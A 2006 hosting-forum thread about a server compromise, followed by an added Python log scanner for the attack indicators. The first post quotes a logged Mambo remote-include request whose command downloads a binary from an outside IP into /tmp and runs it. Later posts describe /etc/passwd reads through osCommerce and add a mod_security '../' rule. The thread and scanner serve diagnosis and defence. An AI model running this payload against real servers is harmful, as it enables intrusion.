The Community Forums


HACKED again?!?!

Discussion in 'General Discussion' started by pcsousa, Mar 24, 2006.

  1. pcsousa (Well-Known Member)

    Hi all.

    Last December my server was hacked: a massive deface using the /tmp executable bug. After that we replaced the server with a new EV1 HD and cPanel image. We checked /tmp and it is set up as a partition in /etc/fstab with something like "/dev/hda3 /tmp ext3 defaults,noexec 1 0".

    Today, when I was running the top application (I usually run it while I'm working) I saw a ./pt process using lots of resources and running as nobody, I think it was nobody. I got in a panic and killed it immediately. I made a search over forums.cpanel.net and found that ./pt is maybe a hacking attempt. I got some strange IPs from Russia and Turkey (always the same) in the http logs and banned them from my machine. Finally I did an ls /etc and voila! a ./bc and psybnc files and directory... bc has run permissions. I removed those files but I have a question.... How can they run applications in /tmp if it is noexec? How do I know what was affected? How can they download applications to my server? Using mambo, oscommerce or phpbb (I usually patch phpbb)?

    I can't sleep till I know how they can get in and how I can protect my server!

    I found lots of
    PHP:
    /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
    which seems like somebody is using a mambo bug to open URLs on another server where they are hacking...

    What can I do to avoid mass defaces?
    Kind regards!
     
  2. jamesbond (Well-Known Member)

    Do a forum search on mod_security, it's exactly what you need. Besides upgrading mambo of course :)
     
  3. pcsousa (Well-Known Member)

    I think mambo is up to date... the "h" version I think. Maybe other users. I'm gonna install mod_security.

    ty.
     
  4. cLub2Share (Well-Known Member, Website Owner)

    It seems to me like they use a shell account.. do you have safe mode enabled? :rolleyes:
     
  5. AndyReed (Well-Known Member, PartnerNOC)

    Although Mod Security is great, it is not a substitute for strong OS and application security. Security is not a "set it and forget it" proposition. Because there are no absolutes, constant monitoring is essential. New attacks are being developed every day and if you're simply going to respond once an attack is discovered it's likely too late. Hackers will use any means to disguise other, more intrusive, exploits. In many cases simply waiting for obvious evidence that you've been hacked means you'll never know you've been hacked. In short, you need to ensure maximum security possible on your server.
     
  6. Infopro (cPanel Sr. Product Evangelist, Staff Member)

    Mambo was moved to Joomla a few months ago and has had several updates since that point. So if you're running Mambo I think you should upgrade it again.
    You'll do yourself good to hire a pro to help with securing your server as well.

    I recommend: http://www.configserver.com/
     
  7. capoti (Active Member)

    yip, mambo is no use no more. do yourself a favor and hire a server management company to secure your server. I highly recommend http://servertune.com
     
  8. pcsousa (Well-Known Member)

    Thank you all for the suggestions.

    It seems they are using /admin/file_manager.php from the osCommerce application to read files inside the server (like /etc/passwd to know how many users you have, and the /home paths; check http://www.opennet.ru/base/cgi/1084898281_16.txt.html) and also to get files into the server using wget. This /admin/ is a demo store, so there was no password protection. I've already removed it. Also I added the following text to mod_security:
    PHP:
    # WEB-PHP osCommerce bug
    SecFilter "filename=\.\./"
    (osCommerce by itself will not use "../"; also, do not forget to leave a blank line at the end of the Mod_Security configuration in cPanel, otherwise cPanel will send an error at the end of the edit page next time)

    Mambo is still developed, right? Joomla is a new community started because of Mambo's "stupid" royalties idea. Also, I saw those mambo references in the httpd logs but all of them return 404 (not found) errors. It seems like a kind of bug search, since for each sequence there are lots of URL tests (post and get), but all 404.
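As an added example (constructed here, not code from any poster in this thread): a small Python scanner that runs the two indicators discussed above, the Mambo mosConfig_absolute_path remote include and the osCommerce file_manager.php "../" traversal, over Apache combined-log lines and separates requests that got a 404 (bug probes, as in the last post) from ones that actually succeeded and need investigation. The sample log lines, IPs and paths are made up.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache combined-log lines modelled on the probes described
# in the thread (IPs, hosts and paths are made up, not taken from real logs).
SAMPLE_LOG = """\
203.0.113.5 - - [24/Mar/2006:10:01:02 +0000] "GET /index2.php?option=com_content&mosConfig_absolute_path=http://198.51.100.9/cmd.gif? HTTP/1.1" 404 512 "-" "Mozilla/4.0"
203.0.113.5 - - [24/Mar/2006:10:01:05 +0000] "GET /shop/index2.php?option=com_content&mosConfig_absolute_path=http://198.51.100.9/cmd.gif? HTTP/1.1" 200 8210 "-" "Mozilla/4.0"
198.51.100.22 - - [24/Mar/2006:11:20:00 +0000] "GET /catalog/admin/file_manager.php?action=read&filename=..%2F..%2F..%2F..%2Fetc/passwd HTTP/1.1" 200 1604 "-" "Wget/1.10"
192.0.2.8 - - [24/Mar/2006:12:00:00 +0000] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 14023 "-" "Mozilla/5.0"
"""

# Apache combined log: client ip, identd, user, [timestamp], "METHOD url PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators from the thread: a Mambo mosConfig_absolute_path pointing at an
# external URL (remote include), and osCommerce file_manager.php with "../".
INDICATORS = {
    "mambo_rfi": re.compile(r"mosconfig_absolute_path=https?://", re.I),
    "oscommerce_traversal": re.compile(r"file_manager\.php.*filename=\.\./", re.I),
}

def classify(line):
    """Return a hit dict for a matching log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = unquote(m.group("url"))  # decode %2F etc. so encoded payloads still match
    for name, pat in INDICATORS.items():
        if pat.search(url):
            status = int(m.group("status"))
            # A 404 means the target script was not even there: a probe.
            # A 2xx/3xx means the request reached a real script: investigate.
            return {"ip": m.group("ip"), "kind": name, "status": status,
                    "severity": "probe" if status == 404 else "investigate"}
    return None

def scan(text):
    """Run classify over every line and keep only the hits."""
    return [hit for hit in (classify(l) for l in text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Feed it the real access_log with something like `scan(open("/usr/local/apache/logs/access_log").read())` and look at the "investigate" entries first.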
     